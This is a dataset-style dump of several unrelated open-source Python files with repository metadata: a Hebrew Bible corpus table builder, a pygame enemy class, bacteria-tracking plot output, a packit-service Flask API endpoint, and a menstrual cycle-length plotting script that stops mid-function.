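#           "scripts/hebrew/build_hebrew_tables.py"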
| 34.012987
| 92
| 0.616393
|
import re
import sys
import csv
import json
import pickle
import collections
from pathlib import Path
from tf.fabric import Fabric
from book_formats import get_book_maps, etcbc2sbl, etcbc2abbr
from verb_form import get_verbform, get_cl_verbform
from modify_domain import permissive_q
from synvar_carc import in_dep_calc as clause_relator
from modify_cltype import simplify_cl_type
from tag_args import clause_objects, get_loca_assocs, clause_locas, clause_time, clause_args
sys.path.append('scripts')
from build_tables import build_sample_tables
TF = Fabric(snakemake.input['tf_mods'], silent='deep')
features = """
sp pdp vs vt ps gn nu
lex language gloss voc_lex voc_lex_utf8
function number label
typ code rela mother domain txt
genre
sense
nhead
funct_assoc
"""
bhsa = TF.load(features, silent='deep')
F, E, T, L, Fs, = bhsa.F, bhsa.E, bhsa.T, bhsa.L, bhsa.Fs
with open(snakemake.input.bhsa2gbi, 'rb') as infile:
bhsa2gbi = pickle.load(infile)
bookmap = get_book_maps(bhsa)
loca_lexs = get_loca_assocs(bhsa)
def join_on(nodes, jchar='_', default=''):
joined_string = f'{jchar}'.join(nodes)
if not joined_string:
return default
else:
return f'{jchar}{joined_string}{jchar}'
def get_preceding_words(node, context='clause'):
context_node = L.u(node, context)[0]
context_words = L.d(context_node, 'word')
prec_words = context_words[:context_words.index(node)]
return prec_words
def main_row(node):
book, chapter, verse = T.sectionFromNode(node)
booksbl = etcbc2sbl[book]
bookabbr = etcbc2abbr[book]
ref_string = f'{book} {chapter}:{verse}'
ref_sbl = f'{booksbl} {chapter}:{verse}'
ref_abbr = f'{bookabbr} {chapter}:{verse}'
verse_node = L.u(node, 'verse')[0]
clause_atom = L.u(node, 'clause_atom')[0]
clause = L.u(node, 'clause')[0]
sent = L.u(node, 'sentence')[0]
clause_type = F.typ.v(clause)
preceding_words = get_preceding_words(node)
prec_lexes = join_on((F.lex.v(w) for w in preceding_words), default='Ø')
prec_pos = join_on((F.pdp.v(w) for w in preceding_words), default='Ø')
domain2 = permissive_q(clause, bhsa)
verbform = get_verbform(node, bhsa, bhsa2gbi)
cl_type_simp = simplify_cl_type(clause_atom, prec_lexes, bhsa)
if verbform == 'ptcp' and clause_type != 'Ptcp':
        cl_args = None
        has_q = None
do_clause = False
else:
do_clause = True
cl_args = clause_args(node, bhsa)
has_q = ('Q' in cl_args) * 1
cl_args = re.match('.*V', cl_args)[0]
particle_types = {'nega', 'advb', 'prep', 'conj', 'prde', 'prin', 'intj', 'inrg'}
prec_particles = join_on(
(F.lex.v(w) for w in preceding_words
if F.pdp.v(w) in particle_types)
, default='Ø')
null_string = ''
row_data = {
'bhsa_node': node,
'ref': ref_string,
'book': book,
'book_super': bookmap['super'].get(book, book),
'canon_part': bookmap['tripart'][book],
'period': bookmap['period'].get(book, ''),
'genre': F.genre.v(verse_node),
'domain2': domain2,
'text_full': F.g_word_utf8.v(node),
'text_plain': F.g_cons_utf8.v(node),
'lex': F.lex_utf8.v(node),
'lex_etcbc': F.lex.v(node),
'gloss': F.gloss.v(node),
'verb_form': verbform,
'stem': F.vs.v(node),
'person': F.ps.v(node),
'gender': F.gn.v(node),
'number': F.nu.v(node),
'valence': F.sense.v(node),
'clause_atom': T.text(clause_atom),
'clause': T.text(clause),
'verse': T.text(verse_node),
'sentence': T.text(sent),
'txt_type': F.txt.v(clause),
'clause_type': clause_type,
'cltype_simp': cl_type_simp,
'clause_rela': clause_relator(clause, bhsa),
'cl_args': cl_args,
'is_question': has_q,
'prec_lexes': prec_lexes,
'prec_pos': prec_pos,
'prec_part': prec_particles,
'ref_sbl': ref_sbl,
'ref_abbr': ref_abbr,
}
if do_clause:
row_data.update(
clause_objects(node, clause_atom, clause, bhsa)
)
row_data.update(
clause_locas(node, loca_lexs, bhsa)
)
row_data.update(
clause_time(node, bhsa)
)
row_data['has_objc'] = 1 * row_data['has_objc']
row_data['has_loca'] = 1 * row_data['has_loca']
return row_data
def nearby_clatom_data(clatom_lookup, starting_clatom):
rel_dat = {
'clause':'', 'cl_atom': '', 'clause_atom':'',
'rela': '', 'domain2': '', 'verbtype': '',
'type': '', 'verb_ps': '', 'verb_lex': '',
'verbplain': '', 'intertext': ''
}
if clatom_lookup:
cl_atom = rel_dat['cl_atom'] = clatom_lookup[0]
cl = L.u(cl_atom, 'clause')[0]
verb = next((w for w in L.d(cl_atom, 'word') if F.pdp.v(w) == 'verb'), 0)
rel_dat['verb_lex'] = F.lex.v(verb)
rel_dat['verb_ps'] = F.ps.v(verb)
rel_dat['type'] = F.typ.v(cl_atom)
rel_dat['verbplain'] = F.g_cons_utf8.v(verb)
rel_dat['verbtype'] = get_cl_verbform(cl_atom, bhsa, bhsa2gbi)
rel_dat['domain2'] = permissive_q(cl, bhsa)
rel_dat['rela'] = clause_relator(cl, bhsa)
rel_dat['clause_atom'] = T.text(cl_atom)
rel_dat['clause'] = T.text(cl)
if cl_atom - starting_clatom <= 3:
if cl_atom < starting_clatom:
interm_clatoms = list(range(cl_atom, starting_clatom))
else:
interm_clatoms = list(range(starting_clatom+1, cl_atom+1))
for cl in interm_clatoms:
rel_dat['intertext'] += T.text(cl)
return rel_dat
def clrela_row(node):
clause_atom = L.u(node, 'clause_atom')[0]
relas = {
'mother': nearby_clatom_data(E.mother.f(clause_atom), clause_atom),
'daught': nearby_clatom_data(E.mother.t(clause_atom), clause_atom)
}
row_data = {'bhsa_node': node}
for relcl, rcdata in relas.items():
row_data.update({
f'{relcl}_{k}': rcdata[k] for k in rcdata
})
return row_data
rowmakers = [main_row, clrela_row]
build_sample_tables(
rowmakers,
snakemake.input.sample,
snakemake.output
)
| true
| true
|
f70b67b26a39bfb74bdcfdb0a3cd91faaca8a144
| 984
|
py
|
Python
|
PyShooter/enemies/zigzagenemy.py
|
ildave/PyShooter
|
ff04fcbcbd144a6959b291fe5242afff6d616eaa
|
[
"MIT"
] | null | null | null |
PyShooter/enemies/zigzagenemy.py
|
ildave/PyShooter
|
ff04fcbcbd144a6959b291fe5242afff6d616eaa
|
[
"MIT"
] | null | null | null |
PyShooter/enemies/zigzagenemy.py
|
ildave/PyShooter
|
ff04fcbcbd144a6959b291fe5242afff6d616eaa
|
[
"MIT"
] | null | null | null |
import pygame
import random
import math
import enemies.enemy
class ZigZagEnemy(enemies.enemy.Enemy):
    """Enemy that turns 90 degrees left or right (chosen at random) each time
    its repeat timer fires, tracing a zig-zag path across the screen."""
def __init__(self, game):
super().__init__(game)
self.timer = self.game.getRepeateTimer()
self.timer.duration = 3000
self.timer.action = self.changeAngle
def changeAngle(self):
if random.randint(0, 1) == 0:
self.angle += math.pi / 2
else:
self.angle -= math.pi / 2
def update(self, elapsed, gameScene):
self.y += math.sin(self.angle) * self.vspeed * elapsed
self.x += math.cos(self.angle) * self.hspeed * elapsed
self.rect.x = self.x
self.rect.y = self.y
if not self.active and not self.inGame():
pass
if not self.active and self.inGame():
self.active = True
if self.active and self.inGame():
pass
if self.active and not self.inGame():
self.kill()
self.timer.cancel()
| 28.114286
| 64
| 0.575203
|
import pygame
import random
import math
import enemies.enemy
class ZigZagEnemy(enemies.enemy.Enemy):
def __init__(self, game):
super().__init__(game)
self.timer = self.game.getRepeateTimer()
self.timer.duration = 3000
self.timer.action = self.changeAngle
def changeAngle(self):
if random.randint(0, 1) == 0:
self.angle += math.pi / 2
else:
self.angle -= math.pi / 2
def update(self, elapsed, gameScene):
self.y += math.sin(self.angle) * self.vspeed * elapsed
self.x += math.cos(self.angle) * self.hspeed * elapsed
self.rect.x = self.x
self.rect.y = self.y
if not self.active and not self.inGame():
pass
if not self.active and self.inGame():
self.active = True
if self.active and self.inGame():
pass
if self.active and not self.inGame():
self.kill()
self.timer.cancel()
| true
| true
|
f70b6a6e97aabeec0b3ae86dcf3cfa2a57216dff
| 4,559
|
py
|
Python
|
mmhelper/output.py
|
jmetz/momanalysis
|
8d71490c99127568b184784890258e9a6ef876ef
|
[
"MIT"
] | null | null | null |
mmhelper/output.py
|
jmetz/momanalysis
|
8d71490c99127568b184784890258e9a6ef876ef
|
[
"MIT"
] | 3
|
2019-07-25T13:43:15.000Z
|
2019-11-04T12:39:22.000Z
|
mmhelper/output.py
|
jmetz/momanalysis
|
8d71490c99127568b184784890258e9a6ef876ef
|
[
"MIT"
] | 1
|
2021-03-28T03:00:21.000Z
|
2021-03-28T03:00:21.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 09 09:59:13 2017
@author: as624
"""
import csv
import os
import matplotlib.pyplot as plt
import numpy as np
def output_detection_figures(
image, wells, bacteria, timeindex, output_dir):
"""
Produces and saves figures showing the output from the detection
Parameters
------
image : ndarray (2D)
The initial image that detection was run on
wells : ndarray (2D) of dtype int
A labelled image showing the detected wells
bacteria : ndarray (2D) of dtype int
A labelled image showing the detected bacteria
timeindex : int
The timepoint that has been analysed
output_dir : str (path)
Where to save the images
"""
# For detection figures, labels not needed (I think)?
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
plt.contour(wells > 0, levels=[0.5], colors=['y'])
#plt.contour(channel>0, levels=[0.5], colors=['r'])
for lab_bac in range(1, bacteria.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
plt.contour(bacteria == lab_bac, levels=[0.5], colors=[col])
plt.savefig(os.path.join(
output_dir, "detection_frame_{:06d}".format(timeindex)))
plt.close()
def output_tracking_figures(
data,
fullwellimages,
wellcoords,
allbacteria,
output_dir,
bacteria_lineage):
"""
Produces and saves figures showing the output after tracking
Parameters
------
data : list of ndarrays
List of initial image that detection was run on
fullwellimages : list of ndarrays
List of labelled images showing the detected wells
wellcoords : list of arrays
Each entry contains a further list where each entry contains well coordinates
allbacteria : list of arrays
List of labelled images showing the detected bacteria
output_dir : str (path)
Where to save the images
bacteria_lineage : dictionary
A dictionary that links the physical unique label of a bacteria
to one which shows information on its lineage
"""
for tpoint, (image, fullwells, bacteria, coords) in enumerate(
zip(data, fullwellimages, allbacteria, wellcoords)):
# For detection figures, labels not needed (I think)?
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
if len(np.unique(fullwells)) == 1:
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
continue
plt.contour(fullwells > 0, levels=[0.5], colors=['y'])
bacteriaim = np.zeros_like(fullwells)
for welllabel in coords:
bacteriaim[coords[welllabel]] = bacteria[welllabel]
# Add in well labels top left(?) of well contour
#bw = fullwells == welllabel
# if not np.any(bw):
# continue
#pos0 = bw.nonzero()
pos = (np.min(coords[welllabel][0]), np.max(coords[welllabel][1]))
plt.text(pos[1], pos[0], "%d" % welllabel, color="y")
for lab_bac in range(1, bacteriaim.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
bw0 = bacteriaim == lab_bac
if not np.any(bw0):
continue
plt.contour(bw0, levels=[0.5], colors=[col])
pos0 = bw0.nonzero()
if len(pos0[0]) == 0 or len(pos0[1]) == 0:
continue
#lab_string = label_dict_string[lab_bac]
pos = (np.min(pos0[0]), np.max(pos0[1]))
plt.text(pos[1], pos[0], str(bacteria_lineage[lab_bac]), color=col)
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
def final_output(measurements, output_dir):
"""outputs a final csv with information on the bacteria detected
Parameters
------
measurements : Custom class instance
Its attribute "bacteria" is a dictionary containing information on
each individual bacteria
output_dir : str (path)
Where to write the csv
"""
output_csv_file = os.path.join(output_dir, 'Results.csv')
with open(output_csv_file, "w", newline='') as file0:
writer = csv.writer(file0)
for numbac, (bac) in enumerate(measurements.bacteria.values()):
if numbac == 0:
writer.writerow(bac.headings_line)
writer.writerow(bac.measurements_output)
| 36.18254
| 85
| 0.611976
|
import csv
import os
import matplotlib.pyplot as plt
import numpy as np
def output_detection_figures(
image, wells, bacteria, timeindex, output_dir):
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
plt.contour(wells > 0, levels=[0.5], colors=['y'])
for lab_bac in range(1, bacteria.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
plt.contour(bacteria == lab_bac, levels=[0.5], colors=[col])
plt.savefig(os.path.join(
output_dir, "detection_frame_{:06d}".format(timeindex)))
plt.close()
def output_tracking_figures(
data,
fullwellimages,
wellcoords,
allbacteria,
output_dir,
bacteria_lineage):
for tpoint, (image, fullwells, bacteria, coords) in enumerate(
zip(data, fullwellimages, allbacteria, wellcoords)):
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
if len(np.unique(fullwells)) == 1:
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
continue
plt.contour(fullwells > 0, levels=[0.5], colors=['y'])
bacteriaim = np.zeros_like(fullwells)
for welllabel in coords:
bacteriaim[coords[welllabel]] = bacteria[welllabel]
pos = (np.min(coords[welllabel][0]), np.max(coords[welllabel][1]))
plt.text(pos[1], pos[0], "%d" % welllabel, color="y")
for lab_bac in range(1, bacteriaim.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
bw0 = bacteriaim == lab_bac
if not np.any(bw0):
continue
plt.contour(bw0, levels=[0.5], colors=[col])
pos0 = bw0.nonzero()
if len(pos0[0]) == 0 or len(pos0[1]) == 0:
continue
pos = (np.min(pos0[0]), np.max(pos0[1]))
plt.text(pos[1], pos[0], str(bacteria_lineage[lab_bac]), color=col)
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
def final_output(measurements, output_dir):
output_csv_file = os.path.join(output_dir, 'Results.csv')
with open(output_csv_file, "w", newline='') as file0:
writer = csv.writer(file0)
for numbac, (bac) in enumerate(measurements.bacteria.values()):
if numbac == 0:
writer.writerow(bac.headings_line)
writer.writerow(bac.measurements_output)
| true
| true
|
f70b6cc1626bd36f34f787aa2d060e18f5411270
| 2,294
|
py
|
Python
|
packit_service/service/api/installations.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | 1
|
2020-03-28T13:57:08.000Z
|
2020-03-28T13:57:08.000Z
|
packit_service/service/api/installations.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | null | null | null |
packit_service/service/api/installations.py
|
FalseG0d/packit-service
|
03f840cdfbcc129582a2ec2a20f069c85fea0c56
|
[
"MIT"
] | null | null | null |
# MIT License
#
# Copyright (c) 2019 Red Hat, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from http import HTTPStatus
from logging import getLogger
try:
from flask_restx import Namespace, Resource
except ModuleNotFoundError:
from flask_restplus import Namespace, Resource
from packit_service.service.events import Event
from packit_service.service.models import Installation
logger = getLogger("packit_service")
ns = Namespace("installations", description="Github App installations")
@ns.route("")
class InstallationsList(Resource):
@ns.response(HTTPStatus.OK, "OK, installations list follows")
def get(self):
"""List all Github App installations"""
return [
Event.ts2str(i["event_data"]) for i in Installation.db().get_all().values()
]
@ns.route("/<int:id>")
@ns.param("id", "Installation identifier")
class InstallationItem(Resource):
@ns.response(HTTPStatus.OK, "OK, installation details follow")
@ns.response(HTTPStatus.NO_CONTENT, "identifier not in whitelist")
def get(self, id):
"""A specific installation details"""
installation = Installation.db().get(id)
no_content = ("", HTTPStatus.NO_CONTENT)
return installation["event_data"] if installation else no_content
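# Note (added; not part of the original module): with this namespace registered
# on the packit-service API, the two resources above answer GET requests of the
# form /installations and /installations/<id>; the exact URL prefix depends on
# how the service mounts the namespace and is not specified here.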
| 39.551724
| 87
| 0.745423
|
from http import HTTPStatus
from logging import getLogger
try:
from flask_restx import Namespace, Resource
except ModuleNotFoundError:
from flask_restplus import Namespace, Resource
from packit_service.service.events import Event
from packit_service.service.models import Installation
logger = getLogger("packit_service")
ns = Namespace("installations", description="Github App installations")
@ns.route("")
class InstallationsList(Resource):
@ns.response(HTTPStatus.OK, "OK, installations list follows")
def get(self):
return [
Event.ts2str(i["event_data"]) for i in Installation.db().get_all().values()
]
@ns.route("/<int:id>")
@ns.param("id", "Installation identifier")
class InstallationItem(Resource):
@ns.response(HTTPStatus.OK, "OK, installation details follow")
@ns.response(HTTPStatus.NO_CONTENT, "identifier not in whitelist")
def get(self, id):
installation = Installation.db().get(id)
no_content = ("", HTTPStatus.NO_CONTENT)
return installation["event_data"] if installation else no_content
| true
| true
|
f70b6e0a29deb0c4886c21ece0571ca190b3699c
| 33,970
|
py
|
Python
|
src/characterization/cycle_period_length_analysis.py
|
iurteaga/menstrual_cycle_analysis
|
799c7cb59d759e0c3929164bccdc5c7ce80324d0
|
[
"MIT"
] | 5
|
2020-03-05T23:30:26.000Z
|
2022-02-27T18:16:23.000Z
|
src/characterization/cycle_period_length_analysis.py
|
iurteaga/menstrual_cycle_analysis
|
799c7cb59d759e0c3929164bccdc5c7ce80324d0
|
[
"MIT"
] | null | null | null |
src/characterization/cycle_period_length_analysis.py
|
iurteaga/menstrual_cycle_analysis
|
799c7cb59d759e0c3929164bccdc5c7ce80324d0
|
[
"MIT"
] | 2
|
2021-03-26T19:56:51.000Z
|
2021-12-22T02:26:14.000Z
|
#!/usr/bin/python
# Imports
import sys, os, re, time
import argparse
import pdb
import pickle
from itertools import *
# Science
import numpy as np
import scipy.stats as stats
import pandas as pd
# Plotting
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import colors
from mpl_toolkits.mplot3d import Axes3D
################################## FUNCTIONS ############################
# Population time-series
def population_time_series_embedding_lengths(cycle_stats_df, attribute, cutoff_criteria, cutoff, sample_style, save_dir):
'''
Function that plots a population level time series embedding of cycle and period lengths
In plot:
x axis is length_attribute for cycle 1,
y axis is length attribute for cycle 2,
z is for cycle 3
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
sample_style: whether to pick 3 consecutive 'random' or 'first' cycles per-user
save_dir: path where to save plot
Output:
None
'''
#get users with color by attribute > cutoff, and <= cutoff
cycle_stats_df_greater_than = cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]
cycle_stats_df_less_than = cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]
cycle_lengths_greater_than = cycle_stats_df_greater_than[attribute]
cycle_lengths_less_than = cycle_stats_df_less_than[attribute]
# Filename
if sample_style == 'first':
filename = '{}/population_time_series_embedding_for_{}_split_by_{}_{}_first_3.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
if sample_style == 'random':
filename = '{}/population_time_series_embedding_for_{}_split_by_{}_{}_sample_3.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
# Plot
colors = ['orange', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for index, cycle_lengths in enumerate([cycle_lengths_greater_than, cycle_lengths_less_than]):
print('Start selecting cycles for one group')
if sample_style=='first':
sample_cycle_lengths = [cycle_length[:3] for cycle_length in cycle_lengths if len(cycle_length) >= 3]
if sample_style=='random':
sample_cycle_lengths = []
for cycle_length in cycle_lengths:
if len(cycle_length) >= 3:
num_cycles_array = np.linspace(0, len(cycle_length)-3, len(cycle_length)-2)
start_index = np.random.choice(num_cycles_array, size=1).astype(int)[0]
sample_cycle_lengths.append(cycle_length[start_index:start_index+3])
print('Finished selecting cycles for one group')
print('Start plotting one group')
for i in range(len(sample_cycle_lengths)):
xs = sample_cycle_lengths[i][0]
ys = sample_cycle_lengths[i][1]
zs = sample_cycle_lengths[i][2]
# Plot this point
ax.scatter(xs, ys, zs, color = colors[index], s=1, alpha=0.3)
print('Finished plotting one group')
ax.set_xlabel(attribute+ '[i]')
ax.set_ylabel(attribute+ '[i+1]')
ax.set_zlabel(attribute+ '[i+2]')
if attribute == 'cycle_lengths':
#ref_line_points = np.linspace(10, 90, 10)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
#ref_line_points = np.linspace(1, max_period_days, 4)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
# With angles
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
# Add (a)/(b) labels for paper
ax.text2D(12, 7,'(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
# Time series embedding for a randomly chosen user
def random_time_series_embedding_lengths(cycle_stats_df, attribute, cutoff_criteria, cutoff, save_dir):
'''
Function that plots a time series embedding of cycle and period lengths for a randomly chosen user per group
In plot:
x axis is length_attribute for cycle i,
y axis is length attribute for cycle i+1,
z is for cycle i+2
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
save_dir: path where to save plot
Output:
None
'''
# Select users with median number of cycles tracked
cycle_stats_df_median = cycle_stats_df[cycle_stats_df['num_cycles_tracked'] == 11]
filename = '{}/random_time_series_embedding_for_{}_split_by_{}_{}.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
#get users with color by attribute > cutoff, and <= cutoff
cycle_stats_df_greater_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] > cutoff]
cycle_stats_df_less_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] <= cutoff]
cycle_lengths_greater_than = cycle_stats_df_greater_than[attribute]
cycle_lengths_less_than = cycle_stats_df_less_than[attribute]
# Randomly pick a user from each group
cycle_lengths_greater_than_user = np.random.choice(cycle_lengths_greater_than, size=1, replace=False)
cycle_lengths_less_than_user = np.random.choice(cycle_lengths_less_than, size=1, replace=False)
# Plot
colors = ['orange', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
#plot each user, color by median intercycle length
xs = list(cycle_lengths_greater_than_user[0][0:-2])
ys = list(cycle_lengths_greater_than_user[0][1:-1])
zs = list(cycle_lengths_greater_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'orange')
ax.plot(xs, ys, zs, color='orange', linestyle='dashed', alpha=0.8)
xs = list(cycle_lengths_less_than_user[0][0:-2])
ys = list(cycle_lengths_less_than_user[0][1:-1])
zs = list(cycle_lengths_less_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'c')
ax.plot(xs, ys, zs, color='c', linestyle='dashed', alpha=0.8)
ax.set_xlabel(attribute+ '[i]')
ax.set_ylabel(attribute+ '[i+1]')
ax.set_zlabel(attribute+ '[i+2]')
if attribute == 'cycle_lengths':
#ref_line_points = np.linspace(10, 90, 10)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
#ref_line_points = np.linspace(1, max_period_days, 4)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
# With angles
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
# Plot period and cycle length distributions per group
def plot_lengths_hist_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, pdf_or_cdf, save_dir):
'''
Function that plots cycle and period length distributions across groups
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about each user's cycle
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
pdf_or_cdf: whether to plot 'pdf's or 'cdf's
save_dir: path where to save plot
Output:
None
'''
# Identify groups per cutoff criteria
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
colors = ['orange', 'c']
labels=['Highly variable', 'NOT highly variable']
if attribute == 'cycle_length':
# Compute histogram
# Bins based on integer range of values
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Cycle length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Cycle length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Population
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
# Per-group
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
# Compute histogram
# Bins based on integer range of values
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
